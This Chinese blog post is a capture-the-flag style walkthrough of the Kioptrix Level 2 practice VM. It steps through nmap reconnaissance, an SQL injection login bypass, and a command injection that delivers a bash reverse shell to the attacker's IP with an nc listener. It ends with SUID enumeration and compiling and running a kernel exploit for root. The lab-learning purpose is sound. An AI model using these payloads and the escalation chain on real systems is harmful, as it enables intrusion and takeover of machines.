首页 > 其他分享 >Kioptrix靶场初探

Kioptrix靶场初探

时间:2023-08-20 21:47:16浏览次数:36  
标签:Kioptrix Setuid nmap 端口 results 192.168 初探 靶场 权限

Kioptrix Level 2


Reference:https://www.bilibili.com/video/BV1Hg4y1V71P/?spm_id_from=333.788&vd_source=f087e6be527de705b4179c540f27e10d

信息收集

探测靶机ip

nmap 192.168.47.1/24 -sn -min-rate 2222 -r

image-20230820185337322

经过推断,192.168.47.129为靶机的IP地址

探测端口

nmap  192.168.47.129 -p- -min-rate 8888 -r -PN -oA nmap_results/port_scan

image-20230820190137496

服务探测

cat nmap_results/port_scan.nmap | grep open | awk -F '/' '{print $1}' | tr '\n' ','

image-20230820191743742

-grep命令用于查找文件里符合条件的字符串或正则表达式。

-awk 用来进行文本分析并执行脚本

-tr 文本替换

该命令是为了将所有扫描的端口利用脚本得到,为了下一步扫描

nmap -sV -sC -O --version-all -oA nmap_results/service_info 192.168.46.129 -p 22,80,111,443,631,836,3306

-sV 探测版本

-sC 探测脚本 等价于 -script-defult

--version-all 尝试每一个强度

-p 指定端口

image-20230820192520212

基本漏洞检测

nmap 192.168.46.129 -script=vuln -oA nmap_results/vuln_info -p 22,80,111,443,631,836,3306

image-20230820193120365

渗透开始


80端口

image-20230820193052230

尝试用万能密码`admin' or '1' = '1

image-20230820193443755

成功登录,观察不难发现可能存在命令注入

image-20230820193539169

开始反弹shell

||bash -i >& /dev/tcp/192.168.47.133/2233 0>&1

nc -lvvp 2233
  • bash: 表示要执行的命令是Bash,即Bourne Again SHell,是一种常见的Unix和Linux操作系统的命令行解释器。
  • -i: 这个选项表示将Bash交互式运行,即打开一个交互式Shell会话,使得用户可以与Shell进行交互。
  • >&: 这是重定向符号,用于将输出重定向到指定的位置。
  • /dev/tcp/192.168.47.133/2233: 这是将输出重定向到的位置。/dev/tcp/ 是Bash的一个特殊设备,可以用于进行网络通信。在这里,它表示连接到指定的IP地址(192.168.47.133)和端口号(2233)。
  • 0>&1: 这是将输入重定向符号,用于将标准输入(文件描述符0)重定向到标准输出(文件描述符1)。这样做的目的是将用户输入的命令发送到远程连接的主机。

image-20230820194145876

成功拿到shell

继续信息收集

查看计划任务

cat /etc/crontab

image-20230820194942441

查看Setuid权限文件

find / -perm -u=s -type f 2>/dev/null
  • -perm: 这是find命令的一个选项,用于指定要匹配的文件权限。
  • -u=s: 这是-perm选项的参数部分,表示要匹配设置了Setuid权限的文件。Setuid权限是一种特殊权限,当用户执行具有Setuid权限的可执行文件时,会以文件所有者的权限来执行,而不是执行用户自己的权限。

image-20230820195523069

查看内核和发行版信息

image-20230820203325423

使用脚本

image-20230820203536388

别问我为什么用第一个(因为视频里用的第一个,其他的暂时未尝试)

本地起http服务方便下载代码

python -m http.server --bind 0.0.0.0 8080

image-20230820203930966

下载代码并执行

image-20230820211908145

绷,这里不知道为什么放在8000 8080端口都无法下载,最后改到8899端口才下载好

订正:应该和端口没有关系,可能是一开始的目录权限不对。在shell中切换到/tmp目录下重新下载就成功了

gcc -Wall 9545.c -o 9545
./9545

image-20230820212017127

标签:Kioptrix,Setuid,nmap,端口,results,192.168,初探,靶场,权限
From: https://www.cnblogs.com/J4m-OvO/p/17644618.html

相关文章

  • Kioptrix: Level 1 (#1) 古老的Apache Samba VULN
    0×01Vulnhub靶机渗透总结之Kioptrix:Level1(#1)......
  • burpsuite靶场----XSS----DOM型XSS4----hashchange
    burpsuite靶场----XSS----DOM型XSS4----hashchange靶场地址https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-selector-hash-change-eventXSS字典链接:https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA提取码:1234正式开始1.查看html源码,......
  • burpsuite靶场----XSS----DOM型XSS3
    burpsuite靶场----XSS----DOM型XSS2靶场地址https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sinkXSS字典链接:https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA提取码:1234正式开始1.进入提交反馈的页面2.发现url为http......
  • burpsuite靶场----XSS----DOM型XSS2
    burpsuite靶场----XSS----DOM型XSS2靶场地址https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sinkXSS字典链接:https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA提取码:1234正式开始1.先输入一定的字符串确定位置2.查看源码发现没......
  • burpsuite靶场----XSS----DOM型XSS1
    burpsuite靶场----XSS----DOM型XSS1靶场地址https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sinkXSS字典链接:https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA提取码:1234正式开始1.先输入一串字符锁定位置2.发现要闭合img标......
  • burpsuite靶场----XSS----存储型XSS1
    burpsuite靶场----XSS----存储型XSS1靶场地址https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encodedXSS字典链接:https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA提取码:1234正式开始找到评论区的地方插入payload......
  • burpsuite靶场----XSS----反射型XSS1
    burpsuite靶场----XSS----反射型XSS1靶场地址https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encodedXSS利用字典链接:https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA提取码:1234正式开始1.先输入一大长串字符2.查看源......
  • burpsuite靶场----SQL注入18----oracle的xml-bypass
    burpsuite靶场----SQL注入18----oracle的DNS-bypass靶场地址https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding正式开始1.随便点击一个viewdetails2.点击下面的checkstock,抓包3.发送到重放模块4.测试注入......
  • burpsuite靶场----SQL注入17----oracle之DNS外带
    burpsuite靶场----SQL注入17----oracle之DNS外带靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration正式开始payload模板:'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-......
  • burpsuite靶场----SQL注入16----DNS外带test
    burpsuite靶场----SQL注入16----oracle之DNS外带test靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band正式开始1.先在burpsuite自带的dns上获取一段url2.使用payload'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+enc......